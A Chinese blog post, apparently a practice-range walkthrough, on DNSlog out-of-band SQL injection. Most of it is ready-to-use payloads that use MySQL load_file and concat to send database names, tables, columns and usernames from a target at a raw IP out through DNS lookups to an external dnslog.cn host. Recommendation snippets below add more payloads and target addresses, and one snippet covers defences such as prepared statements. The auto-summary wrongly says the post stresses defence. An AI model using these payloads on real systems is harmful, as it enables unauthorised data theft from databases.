dns_log进行sql注入回显

最新推荐文章于 2025-01-06 18:23:21 发布
原创 最新推荐文章于 2025-01-06 18:23:21 发布 · 464 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了SQL注入的基本原理和常见手法,包括查询数据库名、当前数据库名、表名及列名,并展示了如何利用load_file函数读取数据。同时,强调了SQL注入的危害,提醒读者关注数据库安全,采取措施防止此类攻击。

http://59.63.200.79:8022/cat/index.php?id=1为例,

以下语句中单引号有问题,为中文,大家自己修正下:

 

查询所有数据库名:(以下为步骤,自己理解并写注入sql)

1.select distinct TABLE_SCHEMA from information_schema.TABLES  //从information_schema库的TABLES表中获取所有的数据库名;

2.可以使用limit每次回显一个数据库名,比如limit 0,1回显第一个数据库名,也可以将所有数据库名组合一起,一起回显,sql语句应该为:select group_concat(TABLE_SCHEMA) from (select distinct TABLE_SCHEMA from information_schema.TABLES);

3.注入sql应该为and load_file(concat('//',(select group_concat(TABLE_SCHEMA) from (select distinct TABLE_SCHEMA from information_schema.TABLES);),'.jv2knh.dnslog.cn/1.txt'))

查询当前数据库名:

and load_file(concat('//',(select database()),'.jv2knh.dnslog.cn/1.txt'))

查询表名:

1.逐个回显:and load_file(concat('//',(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))

2.组合成一个字符串回显:and load_file(concat('//',(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))

查询列名:

and load_file(concat(‘//’,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))

查询数据:

and load_file(concat(‘//’,(select username from users limit 0,1),’.jv2knh.dnslog.cn/1.txt’))

mysql-dnslog注入
Adminxe的博客
05-05 2009
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
SQL注入DnsLog注入
qq_52310755的博客
03-22 2500
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
sql注入sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 2489
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
使用dnslog进行sql注入
CPriLuke的博客
07-12 840
这里主要是补充一下ADO老师在对dnslog进行注入前,对于dnslog的补充说明: 首先登陆http://ceye.io/注册一个账号,并进行登录,登录后在http://ceye.io/profile获取你的域名和token. 测试自己的dnslog是否正常, 直接在网页发送http: 在dnslog的http请求下查询是否存在有该记录: ...
SQL注入DNSlog注入
zh的博客
10-12 970
靶场地址:http://61.136.208.14:8003/ 解题准备:DNSlog平台 解题思路: 1、根据提示,需要使用dnslog平台进行注入 DNSLog Platform 生成并复制域名 2、然后判断靶场的闭合符 id=1 页面正常 id=1' id=1' --+ 报错 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常 确定没有闭合符,应该是数字型 根据DNSlog注入的通用语句,构建注入语句 ?id=1 and (select load_
封神台sql靶场 dns_log 注入
weixin_46578840的博客
06-25 333
前提:目标数据库允许load_file() 1 and 1=1 //正常 1 and 1=2 //页面错误,存在注入 1 and 1=2 union select 1,2 # //回显位为2,由于题目要求用dnslog,那就用联合查询了 构造poyload 1 and (select load_file('//',(concat(select database()),'.xizusd.dnslog.cn/abc'))) 1+and+(select+load_file(concat('//',(select+
掌控者靶场DNS-Log注入过程
zhaoxz1985的博客
07-15 1085
这里写自定义目录标题掌控者靶场DNS-Log注入过程0x01 前言0x02 利用思路0x03 靶场实战第一步:探测数据库名第二步:探测数据表名第三步:探测数据表对应的列名第四步:瞎逼懵0x04 写在最后 掌控者靶场DNS-Log注入过程 以下过程是在听取了线上课程后,结合自身经验,完成的靶场练习,若过程中有错误,还请大佬指正。 0x01 前言 DNS-LogDNS是域名解析系统,说直白点就是机器名和IP地址转换。 DNS-Log,增加了一个log,也就是增加了一个日志记录,只不过记录的DNS的域名解析
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 339
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
SQL注入不存在回显的原因
07-03
SQL注入不存在回显(即无直接反馈)通常是由于应用程序的错误处理机制、输出过滤或架构设计导致的,攻击者无法通过页面错误、数据泄露等直观方式获取注入结果。以下是详细原因分析及应对策略: --- ### **一、无...
No. 30 笔记 | WEB安全之SQL注入全面解析与实操指南 Part 1
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
01-06 1146
SQL 注入是将 SQL 命令插入到 Web 表单递交或页面请求的查询字符串,欺骗服务器执行恶意 SQL 命令。
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 924
SQL注入——DNSlog注入
DNSlog回显
震山的博客
10-11 1308
一个利用 DNSlog 进行 Sql 注入的笔记
利用DNS协议回显数据
hl1293348082的专栏
03-28 611
这个问题已经是去年提出的了,之前也看到过,在 CTF 题目环境中利用过却对原理不慎了解,在公司大佬们的帮助下成功了理解了一波原理。 这里对原理进行一波总结,并利用了 CEYE 平台 http://ceye.io/ 成功的进行了原理复现利用。 原理分析 这个虽然是利用到了比如说 mysql 的 LOAD_FILE 函数,其实本质还是对 windows 的资源管理器的一个利用,利用协议 // 去进行一个子域名的 DNS 解析,将你需要的(你取得的一些有用信息当做子域名信息给传递出来) 先了解下
SQL注入篇——dns回显注入
爱国小白帽
02-10 2211
dns回显注入的使用场景 当目标无显示位也无错误回显时便可使用此方法 1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址 2、将获取到的地址复制填入SQL语句中执行 注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可 注入语句: id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslo...
SQL DNSlog注入详解
永远是少年
08-07 1511
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
通过sqli-labs-master第八关完成dns带外攻击回显
快递小哥的博客
01-09 727
1.利用dns缓存原理找到数据(dnslog平台查询) 2.在mysql里面获取想要的参数(load_file() 读取文件函数 version() 版本信息函数)concat() 多列合并到一起 1.txt是文件名(可以新创一个,主要是让函数生效) ,可以把一整个理解成是localhost\\1.txt,前面是网站路径,是在这个路径里面拿文件,这样版本号就出来了 ...
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入
柠檬i的博客
08-07 1879
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
渗透测试 回显机制平台 dnslog 搭建
whatday的专栏
08-07 2684
目录 1 前言 2 前期准备 3 实验过程 3.1 添加DNS解析 3.2 对外开放53端口 3.3 DNSLOG代码 4 WEB界面 5 后记 1 前言 DNSLOG是一种回显机制,常用于在某些漏洞无法回显但可以发起DNS请求的情况下,利用此方式外带数据,以解决某些漏洞由于无回显而难以利用的问题。主要利用场景有SQL盲注、无回显的命令执行、无回显的SSRF。本文介绍一种搭建DNSLOG平台的方法,旨在为渗透测试提供一些帮助。 2 前期准备 一个域名...
SQL注入dns回显注入
qq_41679358的博客
08-03 2236
DNSlog外带数据注入 用到的网站 http://dnsbin.zhack.ca/ http://dnslog.cn/ http://ceye.io/ pyload: 查库 http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+ 查表 http://192.168.232.128/sqllabs/Less-8/?id=1'
SQL注入回显位panding
最新发布
11-27
### SQL注入回显位panding原理 在SQL注入中,回显位指的是数据库查询结果能够在页面上显示出来的位置。而“panding”可能是表述有误,推测你想问的是“判断”回显位。判断回显位的原理基于构造特殊的SQL语句,利用数据库的特性来确定哪些位置可以将查询结果反馈到页面。 通常会采用联合查询(UNION SELECT)的方式。联合查询要求两个或多个SELECT语句的列数和数据类型要一致。攻击者会构造不同列数的联合查询语句,通过观察页面是否报错或者显示异常来判断回显位。例如,先构造`' UNION SELECT 1 --` 尝试,如果页面报错,说明列数不匹配,接着尝试`' UNION SELECT 1,2 --` ,不断增加列数,直到页面正常显示或者出现预期的结果,此时确定的列数就是回显位的数量。 ### SQL注入回显位判断的解决方案 #### 输入验证 对用户输入进行严格的验证和过滤,只允许合法的字符和格式。可以使用正则表达式来限制输入的内容,例如只允许字母、数字等合法字符。 ```python import re user_input = input("请输入内容:") pattern = re.compile(r'^[a-zA-Z0-9]+$') if not pattern.match(user_input): print("输入包含非法字符") ``` #### 预编译语句 使用预编译语句(Prepared Statements)可以有效防止SQL注入。预编译语句会将SQL语句和用户输入参数分开处理,数据库对SQL语句进行预编译,参数会作为独立的数据进行传递,不会被解析为SQL代码的一部分。 ```java import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; public class PreparedStatementExample { public static void main(String[] args) { String url = "jdbc:mysql://localhost:3306/mydb"; String username = "root"; String password = "password"; String userInput = "test"; try (Connection conn = DriverManager.getConnection(url, username, password)) { String sql = "SELECT * FROM users WHERE username = ?"; PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, userInput); ResultSet rs = pstmt.executeQuery(); while (rs.next()) { System.out.println(rs.getString("username")); } } catch (SQLException e) { e.printStackTrace(); } } } ``` #### 最小权限原则 为数据库用户分配最小的必要权限。例如,只给应用程序的数据库用户授予查询数据的权限,而不授予修改、删除等危险操作的权限,即使发生SQL注入,攻击者也无法进行严重的破坏。 #### 错误信息屏蔽 避免在页面上显示详细的数据库错误信息。详细的错误信息可能会给攻击者提供有用的信息,如数据库类型、表名、列名等。应该将错误信息记录到日志文件中,而在页面上只显示通用的错误提示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

THMAIL

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值